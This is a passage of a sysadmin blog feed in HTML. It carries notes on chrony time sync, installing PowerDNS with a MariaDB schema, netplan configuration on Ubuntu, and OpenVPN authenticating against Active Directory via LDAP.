+0ns<span style="color:#f92672">[</span> +0ns<span style="color:#f92672">]</span> +/- 0ns </span></span><span style="display:flex;"><span>^- 61-216-153-105.hinet-ip.&gt; <span style="color:#ae81ff">3</span> <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">37</span> <span style="color:#ae81ff">23</span> -280us<span style="color:#f92672">[</span> -280us<span style="color:#f92672">]</span> +/- 64ms </span></span></code></pre></div><h5 id="view-sync-source-info">View sync source info</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>~# chronyc sourcestats -v </span></span><span style="display:flex;"><span><span style="color:#ae81ff">210</span> Number of sources <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span> </span></span><span style="display:flex;"><span> .- Number of sample points in measurement set. </span></span><span style="display:flex;"><span> / .- Number of residual runs with same sign. </span></span><span style="display:flex;"><span> | / .- Length of measurement set <span style="color:#f92672">(</span>time<span style="color:#f92672">)</span>. </span></span><span style="display:flex;"><span> | | / .- Est. clock freq error <span style="color:#f92672">(</span>ppm<span style="color:#f92672">)</span>. </span></span><span style="display:flex;"><span> | | | / .- Est. error in freq. </span></span><span style="display:flex;"><span> | | | | / .- Est. offset. </span></span><span style="display:flex;"><span> | | | | | | On the -. </span></span><span style="display:flex;"><span> | | | | | | samples. <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> | | | | | | | </span></span><span style="display:flex;"><span>Name/IP Address NP NR Span Frequency Freq Skew Offset Std Dev </span></span><span style="display:flex;"><span><span style="color:#f92672">==============================================================================</span> </span></span><span style="display:flex;"><span>59-124-29-241.hinet-ip.h&gt; <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">5</span> <span style="color:#ae81ff">135</span> -0.454 4.553 -784us 66us </span></span><span style="display:flex;"><span>61-216-153-107.hinet-ip.&gt; <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">135</span> +4.455 19.761 +622us 247us </span></span><span style="display:flex;"><span>59-125-122-217.hinet-ip.&gt; <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> +0.000 2000.000 +0ns 4000ms </span></span><span style="display:flex;"><span>61-216-153-105.hinet-ip.&gt; <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">4</span> <span style="color:#ae81ff">136</span> +8.965 42.440 +1250us 495us </span></span></code></pre></div><h5 id="write-system-time-to-hardware-clock">Write system time to hardware clock</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>~# hwclock --systohc </span></span><span style="display:flex;"><span>~# date ; hwclock </span></span><span style="display:flex;"><span>Tue Mar <span style="color:#ae81ff">27</span> 14:07:57 CST <span style="color:#ae81ff">2018</span> </span></span><span style="display:flex;"><span>Tue <span style="color:#ae81ff">27</span> Mar <span style="color:#ae81ff">2018</span> 02:07:58 PM CST -0.938012 seconds </span></span></code></pre></div>https://linzeyan.github.io/posts/2020/20200925-install-powerdns-and-powerdns-admin-on-ubuntu/Fri, 25 Sep 2020 09:38:17 +0800https://linzeyan.github.io/posts/2020/20200925-install-powerdns-and-powerdns-admin-on-ubuntu/<ul> <li><a href="https://computingforgeeks.com/install-powerdns-and-powerdns-admin-on-ubuntu/" target="_blank" rel="noopener">Install PowerDNS and PowerDNS-Admin on Ubuntu 22.04|20.04|18.04</a></li> <li><a href="https://blog.zswap.net/master-master-powerdns-with-galera-replication/" target="_blank" rel="noopener">Master-Master PowerDNS with Galera Replication</a></li> <li><a href="https://www.scaleway.com/en/docs/installing-powerdns-server-on-ubuntu-bionic/" target="_blank" rel="noopener">https://www.scaleway.com/en/docs/installing-powerdns-server-on-ubuntu-bionic/</a></li> </ul> <h4 id="install-powerdns">Install PowerDNS</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ sudo apt update </span></span><span style="display:flex;"><span>$ sudo apt install mariadb-server -y </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ sudo mysql -u root </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">DATABASE</span> powerdns; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">GRANT</span> <span style="color:#66d9ef">ALL</span> <span style="color:#66d9ef">ON</span> powerdns.<span style="color:#f92672">*</span> <span style="color:#66d9ef">TO</span> <span style="color:#e6db74">&#39;powerdns&#39;</span><span style="color:#f92672">@</span><span style="color:#e6db74">&#39;localhost&#39;</span> IDENTIFIED <span style="color:#66d9ef">BY</span> <span style="color:#e6db74">&#39;Str0ngPasswOrd&#39;</span>; </span></span><span style="display:flex;"><span>FLUSH <span style="color:#66d9ef">PRIVILEGES</span>; </span></span><span style="display:flex;"><span>USE powerdns; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> domains ( </span></span><span style="display:flex;"><span> id INT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> name VARCHAR(<span style="color:#ae81ff">255</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> master VARCHAR(<span style="color:#ae81ff">128</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> last_check INT <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">type</span> VARCHAR(<span style="color:#ae81ff">6</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> notified_serial INT UNSIGNED <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> account VARCHAR(<span style="color:#ae81ff">40</span>) CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;utf8&#39;</span> <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">UNIQUE</span> <span style="color:#66d9ef">INDEX</span> name_index <span style="color:#66d9ef">ON</span> domains(name); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> records ( </span></span><span style="display:flex;"><span> id BIGINT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> domain_id INT <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> name VARCHAR(<span style="color:#ae81ff">255</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">type</span> VARCHAR(<span style="color:#ae81ff">10</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> content VARCHAR(<span style="color:#ae81ff">64000</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> ttl INT <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> prio INT <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> change_date INT <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> disabled TINYINT(<span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#ae81ff">0</span>, </span></span><span style="display:flex;"><span> ordername VARCHAR(<span style="color:#ae81ff">255</span>) BINARY <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> auth TINYINT(<span style="color:#ae81ff">1</span>) <span style="color:#66d9ef">DEFAULT</span> <span style="color:#ae81ff">1</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> nametype_index <span style="color:#66d9ef">ON</span> records(name,<span style="color:#66d9ef">type</span>); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> domain_id <span style="color:#66d9ef">ON</span> records(domain_id); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> ordername <span style="color:#66d9ef">ON</span> records (ordername); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> supermasters ( </span></span><span style="display:flex;"><span> ip VARCHAR(<span style="color:#ae81ff">64</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> nameserver VARCHAR(<span style="color:#ae81ff">255</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> account VARCHAR(<span style="color:#ae81ff">40</span>) CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;utf8&#39;</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (ip, nameserver) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> comments ( </span></span><span style="display:flex;"><span> id INT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> domain_id INT <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> name VARCHAR(<span style="color:#ae81ff">255</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">type</span> VARCHAR(<span style="color:#ae81ff">10</span>) <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> modified_at INT <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> account VARCHAR(<span style="color:#ae81ff">40</span>) CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;utf8&#39;</span> <span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">comment</span> TEXT CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;utf8&#39;</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> comments_name_type_idx <span style="color:#66d9ef">ON</span> comments (name, <span style="color:#66d9ef">type</span>); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> comments_order_idx <span style="color:#66d9ef">ON</span> comments (domain_id, modified_at); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> domainmetadata ( </span></span><span style="display:flex;"><span> id INT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> domain_id INT <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> kind VARCHAR(<span style="color:#ae81ff">32</span>), </span></span><span style="display:flex;"><span> content TEXT, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> domainmetadata_idx <span style="color:#66d9ef">ON</span> domainmetadata (domain_id, kind); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> cryptokeys ( </span></span><span style="display:flex;"><span> id INT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> domain_id INT <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> flags INT <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>, </span></span><span style="display:flex;"><span> active BOOL, </span></span><span style="display:flex;"><span> content TEXT, </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span>(id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">INDEX</span> domainidindex <span style="color:#66d9ef">ON</span> cryptokeys(domain_id); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">TABLE</span> tsigkeys ( </span></span><span style="display:flex;"><span> id INT AUTO_INCREMENT, </span></span><span style="display:flex;"><span> name VARCHAR(<span style="color:#ae81ff">255</span>), </span></span><span style="display:flex;"><span> algorithm VARCHAR(<span style="color:#ae81ff">50</span>), </span></span><span style="display:flex;"><span> secret VARCHAR(<span style="color:#ae81ff">255</span>), </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">PRIMARY</span> <span style="color:#66d9ef">KEY</span> (id) </span></span><span style="display:flex;"><span>) Engine<span style="color:#f92672">=</span>InnoDB CHARACTER <span style="color:#66d9ef">SET</span> <span style="color:#e6db74">&#39;latin1&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">CREATE</span> <span style="color:#66d9ef">UNIQUE</span> <span style="color:#66d9ef">INDEX</span> namealgoindex <span style="color:#66d9ef">ON</span> tsigkeys(name, algorithm); </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ sudo systemctl disable systemd-resolved </span></span><span style="display:flex;"><span>$ sudo systemctl stop systemd-resolved </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ ls -lh /etc/resolv.conf </span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">39</span> Jul <span style="color:#ae81ff">24</span> 15:50 /etc/resolv.conf -&gt; ../run/systemd/resolve/stub-resolv.conf </span></span><span style="display:flex;"><span>$ sudo unlink /etc/resolv.conf </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ echo <span style="color:#e6db74">&#34;nameserver 8.8.8.8&#34;</span> | sudo tee /etc/resolv.conf </span></span></code></pre></div><p>Add official PowerDNS repository for Ubuntu 22.04|20.04|18.04.</p>https://linzeyan.github.io/posts/2020/20200918-ubuntu-18-04/Fri, 18 Sep 2020 13:00:05 +0800https://linzeyan.github.io/posts/2020/20200918-ubuntu-18-04/<ul> <li><a href="https://blog.toright.com/posts/6293/ubuntu-18-04-%E9%80%8F%E9%81%8E-netplan-%E8%A8%AD%E5%AE%9A%E7%B6%B2%E8%B7%AF%E5%8D%A1-ip.html" target="_blank" rel="noopener">Set interface IP with netplan on Ubuntu 18.04</a></li> </ul> <p>Following the notes above, check <code>/etc/netplan</code> and open <code>/etc/netplan/50-cloud-init.yaml</code>:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e"># This file is generated from information provided by</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># the datasource. Changes to it will not persist across an instance.</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># To disable cloud-init&#39;s network configuration capabilities, write a file</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># network: {config: disabled}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">network</span>: </span></span><span style="display:flex;"><span> <span style="color:#f92672">ethernets</span>: </span></span><span style="display:flex;"><span> <span style="color:#f92672">ens192</span>: </span></span><span style="display:flex;"><span> <span style="color:#f92672">dhcp4</span>: <span style="color:#66d9ef">true</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">ens224</span>: </span></span><span style="display:flex;"><span> <span style="color:#f92672">dhcp4</span>: <span style="color:#66d9ef">true</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span> </span></span></code></pre></div><p>It looks like you can disable cloud network, but I do not use cloud-init, so remove it:</p>https://linzeyan.github.io/posts/2020/20200917-5b892a0b2b71775d1ce04eff/Thu, 17 Sep 2020 13:15:33 +0800https://linzeyan.github.io/posts/2020/20200917-5b892a0b2b71775d1ce04eff/<ul> <li><a href="https://www.twblogs.net/a/5b892a0b2b71775d1ce04eff" target="_blank" rel="noopener">Deploying OpenVPN with AD domain authentication</a></li> <li><a href="https://jameschien.no-ip.biz/wordpress/2020/02/19/openvpn-pam-sssd-active-directory/" target="_blank" rel="noopener">OpenVPN + PAM + SSSD + Active Directory</a></li> <li><a href="https://computingforgeeks.com/install-and-configure-openvpn-server-on-rhel-centos-8/" target="_blank" rel="noopener">https://computingforgeeks.com/install-and-configure-openvpn-server-on-rhel-centos-8/</a></li> <li><a href="https://www.redhat.com/en/blog/consistent-security-crypto-policies-red-hat-enterprise-linux-8" target="_blank" rel="noopener">https://www.redhat.com/en/blog/consistent-security-crypto-policies-red-hat-enterprise-linux-8</a></li> <li><a href="https://medium.com/jerrynotes/linux-authentication-windows-ad-without-join-domain-7963c3fd44c5" target="_blank" rel="noopener">https://medium.com/jerrynotes/linux-authentication-windows-ad-without-join-domain-7963c3fd44c5</a></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Install OpenVPN</span> </span></span><span style="display:flex;"><span>yum install openvpn -y </span></span><span style="display:flex;"><span>yum -y install openssl openssl-devel -y </span></span><span style="display:flex;"><span>yum -y install lzo lzo-devel -y </span></span><span style="display:flex;"><span>yum install -y libgcrypt libgpg-error libgcrypt-devel </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Install OpenVPN auth plugin</span> </span></span><span style="display:flex;"><span>yum install openvpn-auth-ldap -y </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Install easy-rsa</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Since openvpn 2.3 removed easy-rsa from the package, install it separately.</span> </span></span><span style="display:flex;"><span>yum install easy-rsa </span></span><span style="display:flex;"><span>cp -rf /usr/share/easy-rsa/2.0 /etc/opevpn/ </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Generate OpenVPN keys and certificates</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Edit `/opt/openvpn/etc/easy-rsa/2.0/vars` parameters</span> </span></span><span style="display:flex;"><span>export KEY_COUNTRY<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;CN&#34;</span> <span style="color:#75715e"># Country</span> </span></span><span style="display:flex;"><span>export KEY_PROVINCE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;ZJ&#34;</span> <span style="color:#75715e"># Province</span> </span></span><span style="display:flex;"><span>export KEY_CITY<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;NingBo&#34;</span> <span style="color:#75715e"># City</span> </span></span><span style="display:flex;"><span>export KEY_ORG<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;TEST-VPN&#34;</span> <span style="color:#75715e"># Organization</span> </span></span><span style="display:flex;"><span>exportKEY_EMAIL<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;81367070@qq.com&#34;</span> <span style="color:#75715e"># Email</span> </span></span><span style="display:flex;"><span>export KEY_OU<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;baidu&#34;</span> <span style="color:#75715e"># Unit</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>source vars </span></span><span style="display:flex;"><span>./clean-all </span></span><span style="display:flex;"><span>./build-ca </span></span><span style="display:flex;"><span>./build-dh </span></span><span style="display:flex;"><span>./build-key-server server </span></span><span style="display:flex;"><span>./build-key client1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Edit the OpenVPN server config: `/etc/openvpn/server.conf`</span> </span></span><span style="display:flex;"><span>port <span style="color:#ae81ff">1194</span> </span></span><span style="display:flex;"><span>proto udp </span></span><span style="display:flex;"><span>dev tun </span></span><span style="display:flex;"><span>ca keys/ca.crt </span></span><span style="display:flex;"><span>cert keys/server.crt </span></span><span style="display:flex;"><span>key keys/server.key <span style="color:#75715e"># This file should be kept secret</span> </span></span><span style="display:flex;"><span>dh keys/dh2048.pem </span></span><span style="display:flex;"><span>server 10.8.0.0 255.255.255.0 // client IP pool </span></span><span style="display:flex;"><span>push <span style="color:#e6db74">&#34;route 192.168.1.0 255.255.255.0&#34;</span> // push route to clients </span></span><span style="display:flex;"><span>push <span style="color:#e6db74">&#34;redirect-gateway&#34;</span> // change client gateway to route VPN traffic </span></span><span style="display:flex;"><span>ifconfig-pool-persist ipp.txt </span></span><span style="display:flex;"><span>keepalive <span style="color:#ae81ff">10</span> <span style="color:#ae81ff">120</span> </span></span><span style="display:flex;"><span>comp-lzo </span></span><span style="display:flex;"><span>persist-key </span></span><span style="display:flex;"><span>persist-tun </span></span><span style="display:flex;"><span>status openvpn-status.log </span></span><span style="display:flex;"><span>verb <span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span>plugin /usr/lib64/openvpn/plugin/lib/openvpn-auth-ldap.so <span style="color:#e6db74">&#34;/etc/openvpn/auth/ldap.conf&#34;</span> </span></span><span style="display:flex;"><span>client-cert-not-required </span></span><span style="display:flex;"><span>username-as-common-name </span></span><span style="display:flex;"><span>log /var/log/openvpn.log </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Edit openvpn-ldap-auth config: `/etc/openvpn/auth/ldap.conf`</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># /etc/openvpn/auth/ldap.conf</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>&lt;LDAP&gt; </span></span><span style="display:flex;"><span> <span style="color:#75715e"># LDAP server URL</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Change to the AD server IP</span> </span></span><span style="display:flex;"><span> URL ldap://172.16.76.238:389 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Bind DN (If your LDAP server doesn&#39;t support anonymous binds)</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># BindDN uid=Manager,ou=People,dc=example,dc=com</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Change to the domain admin DN; you can query it with ldapsearch</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Replace the IP in -h with the server IP, -D with the admin DN, -b with the base DN, and * for all</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># ldapsearch -LLL -x -h 172.16.76.238 -D &#34;administrator@xx.com&#34; -W -b &#34;dc=xx,dc=com&#34; &#34;*&#34;</span> </span></span><span style="display:flex;"><span> BindDN <span style="color:#e6db74">&#34;cn=administrator,cn=Users,dc=xx,dc=com&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Bind Password</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Password SecretPassword</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Domain admin password</span> </span></span><span style="display:flex;"><span> Password passwd </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Network timeout (in seconds)</span> </span></span><span style="display:flex;"><span> Timeout <span style="color:#ae81ff">15</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Enable Start TLS</span> </span></span><span style="display:flex;"><span> TLSEnable no </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Follow LDAP Referrals (anonymously)</span> </span></span><span style="display:flex;"><span> FollowReferrals no </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLS CA Certificate File</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLSCACertFile /usr/local/etc/ssl/ca.pem</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLS CA Certificate Directory</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLSCACertDir /etc/ssl/certs</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Client Certificate and key</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># If TLS client authentication is required</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLSCertFile /usr/local/etc/ssl/client-cert.pem</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLSKeyFile /usr/local/etc/ssl/client-key.pem</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Cipher Suite</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># The defaults are usually fine here</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># TLSCipherSuite ALL:!ADH:@STRENGTH</span> </span></span><span style="display:flex;"><span>&lt;/LDAP&gt; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>&lt;Authorization&gt; </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Base DN</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Base DN for auth search</span> </span></span><span style="display:flex;"><span> BaseDN <span style="color:#e6db74">&#34;dc=boqii-inc,dc=com&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># User Search Filter</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># SearchFilter &#34;(&amp;(uid=%u)(accountStatus=active))&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># sAMAccountName=%u uses the sAMAccountName value as the username,</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># and &#34;memberof=CN=myvpn,DC=xx,DC=com&#34; points to the VPN user group to authenticate,</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># so any user can use VPN once they are in this group.</span> </span></span><span style="display:flex;"><span> SearchFilter <span style="color:#e6db74">&#34;(&amp;(sAMAccountName=%u)(memberof=CN=myvpn,DC=boqii-inc,DC=com))&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Require Group Membership</span> </span></span><span style="display:flex;"><span> RequireGroup false </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># Add non-group members to a PF table (disabled)</span> </span></span><span style="display:flex;"><span> <span style="color:#75715e"># PFTable ips_vpn_users</span> </span></span><span style="display:flex;"><span> </span></span><span 